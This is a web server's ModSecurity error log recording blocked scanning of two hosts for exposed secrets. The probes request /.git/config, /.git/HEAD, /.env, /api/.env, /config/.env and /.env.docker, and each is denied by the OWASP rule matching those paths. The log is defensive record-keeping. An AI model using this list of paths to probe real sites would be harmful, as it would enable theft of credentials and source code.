[Wed Sep 24 22:08:41.034442 2025] [:error] [pid 2981608] [client 93.123.109.7:50120] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNRPychdVe-yI8mMLZsm6gAAAAw"]
[Wed Sep 24 22:08:41.034887 2025] [:error] [pid 2981608] [client 93.123.109.7:50120] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNRPychdVe-yI8mMLZsm6gAAAAw"]
[Wed Sep 24 22:08:41.035137 2025] [:error] [pid 2981608] [client 93.123.109.7:50120] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNRPychdVe-yI8mMLZsm6gAAAAw"]
[Wed Sep 24 22:08:41.035457 2025] [:error] [pid 2967881] [client 93.123.109.7:50130] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNRPyZI58xXToswI6_ccKwAAAAU"]
[Wed Sep 24 22:08:41.035684 2025] [:error] [pid 2967881] [client 93.123.109.7:50130] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNRPyZI58xXToswI6_ccKwAAAAU"]
[Wed Sep 24 22:08:41.035833 2025] [:error] [pid 2967881] [client 93.123.109.7:50130] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNRPyZI58xXToswI6_ccKwAAAAU"]
[Thu Sep 25 02:49:24.446296 2025] [:error] [pid 2988639] [client 45.130.203.141:65421] [client 45.130.203.141] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNSRlDuz1ahqJ7VFh4P4vwAAAAM"]
[Thu Sep 25 02:49:24.446696 2025] [:error] [pid 2988639] [client 45.130.203.141:65421] [client 45.130.203.141] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNSRlDuz1ahqJ7VFh4P4vwAAAAM"]
[Thu Sep 25 02:49:24.446900 2025] [:error] [pid 2988639] [client 45.130.203.141:65421] [client 45.130.203.141] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aNSRlDuz1ahqJ7VFh4P4vwAAAAM"]
[Fri Sep 26 03:33:43.455900 2025] [:error] [pid 3017946] [client 176.65.149.195:33716] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNXtd3ElTHVixFKwFf2lywAAAAU"]
[Fri Sep 26 03:33:43.456181 2025] [:error] [pid 3017946] [client 176.65.149.195:33716] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNXtd3ElTHVixFKwFf2lywAAAAU"]
[Fri Sep 26 03:33:43.456349 2025] [:error] [pid 3017946] [client 176.65.149.195:33716] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNXtd3ElTHVixFKwFf2lywAAAAU"]
[Fri Sep 26 06:16:11.319807 2025] [:error] [pid 3017921] [client 45.139.104.204:59386] [client 45.139.104.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYTi42pVYCwtVFizmuoQgAAAAA"]
[Fri Sep 26 06:16:11.320158 2025] [:error] [pid 3017921] [client 45.139.104.204:59386] [client 45.139.104.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYTi42pVYCwtVFizmuoQgAAAAA"]
[Fri Sep 26 06:16:11.320363 2025] [:error] [pid 3017921] [client 45.139.104.204:59386] [client 45.139.104.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYTi42pVYCwtVFizmuoQgAAAAA"]
[Fri Sep 26 07:46:00.863949 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNYomAlYhA3fp197bl9fLwAAAAI"]
[Fri Sep 26 07:46:00.865205 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNYomAlYhA3fp197bl9fLwAAAAI"]
[Fri Sep 26 07:46:00.865371 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNYomAlYhA3fp197bl9fLwAAAAI"]
[Fri Sep 26 07:46:00.952302 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMAAAAAI"]
[Fri Sep 26 07:46:00.952709 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMAAAAAI"]
[Fri Sep 26 07:46:00.952918 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMAAAAAI"]
[Fri Sep 26 07:46:00.979808 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMQAAAAI"]
[Fri Sep 26 07:46:00.980134 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMQAAAAI"]
[Fri Sep 26 07:46:00.980286 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNYomAlYhA3fp197bl9fMQAAAAI"]
[Fri Sep 26 07:46:01.074886 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeAAAAAM"]
[Fri Sep 26 07:46:01.075303 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeAAAAAM"]
[Fri Sep 26 07:46:01.075485 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeAAAAAM"]
[Fri Sep 26 07:46:01.099984 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeQAAAAM"]
[Fri Sep 26 07:46:01.100402 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeQAAAAM"]
[Fri Sep 26 07:46:01.100585 2025] [:error] [pid 3017924] [client 185.177.72.21:42524] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aNYombCzNZ7E2mkqFjMFeQAAAAM"]
[Fri Sep 26 07:46:01.116565 2025] [:error] [pid 3017922] [client 185.177.72.21:42532] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomWDI_PUlwDPWY03fYgAAAAE"]
[Fri Sep 26 07:46:01.116969 2025] [:error] [pid 3017922] [client 185.177.72.21:42532] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomWDI_PUlwDPWY03fYgAAAAE"]
[Fri Sep 26 07:46:01.117152 2025] [:error] [pid 3017922] [client 185.177.72.21:42532] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomWDI_PUlwDPWY03fYgAAAAE"]
[Fri Sep 26 07:46:01.122912 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqgAAAAc"]
[Fri Sep 26 07:46:01.123431 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqgAAAAc"]
[Fri Sep 26 07:46:01.123628 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqgAAAAc"]
[Fri Sep 26 07:46:01.141374 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomQlYhA3fp197bl9fMwAAAAI"]
[Fri Sep 26 07:46:01.141768 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomQlYhA3fp197bl9fMwAAAAI"]
[Fri Sep 26 07:46:01.141981 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aNYomQlYhA3fp197bl9fMwAAAAI"]
[Fri Sep 26 07:46:01.152066 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqwAAAAc"]
